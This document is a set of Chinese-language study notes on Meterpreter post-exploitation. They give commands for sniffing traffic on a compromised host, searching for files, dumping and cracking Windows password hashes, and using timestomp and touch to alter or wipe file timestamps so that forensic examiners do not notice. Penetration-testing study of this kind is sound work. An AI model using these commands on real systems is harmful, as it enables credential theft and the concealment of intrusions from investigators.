meterpreter在内存里运行

抓包

load sniffer

启动一个缓存区块来存储数据包（5000）

load sniffer
sniffer_interfaces
sniffer_start 2
sniffer_dump 2 1.cap
/ sniffer_dump 2 1.cap

自动过滤meterpreter流量，全程使用 SSL/TLS加密

用msf解数据包

use auxiliary/sniffer/psnuffle

set PCAPFILE 1.cap

搜索文件

search -f *.ini

空格需要加转义符
search -d c:\\documents\ and\settings\\administrator\\desktop\\ -f *.docx

密码破解

获取hash，得有system权限，结果在tmp下

use post/windows/gather/hashdump

破解 John the Ripper

use auxiliary/analyze/jtr_crack_fast

自动调用tmp里的hash

文件系统访问会留下痕迹，电子取证重点关注

访问文件系统就如在雪地上行走

避免被电子取证发现，不要碰文件系统，meterpreter先天优势，完全基于内存

 MAC时间（Modified 修改/Accessed 最后访问查看时间/Changed 属性修改记录）

MACE：MFT entry 微软下有，mft的项

MFT：主文件分配表，通常在最前的分区，通常1024字节或两个硬盘扇区，其中存放多项entry信息，包含大量信息（大小 名称 目录位置 磁盘位置 创建时间）

查看

ls -l --time=atime/mtime/ctime 1.txt

stat 1.txt

修改时间

touch -d "2 days ago" 1.txt
touch -t 1501010101 1.txt

msf的修改工具

Timestomp (meterpreter)

timestomp -v 1.txt 查看

timestomp -f c:\\autoexec.bat 1.txt 从模板提取时间出了修改到目标

timestomp -z "MM/DD/YYYY HH24:MI:SS" 2.txt 手动的修改某个时间 -m / -a / -c / -e / -z

-b 擦除MACE -r 递归一个目录，全部擦掉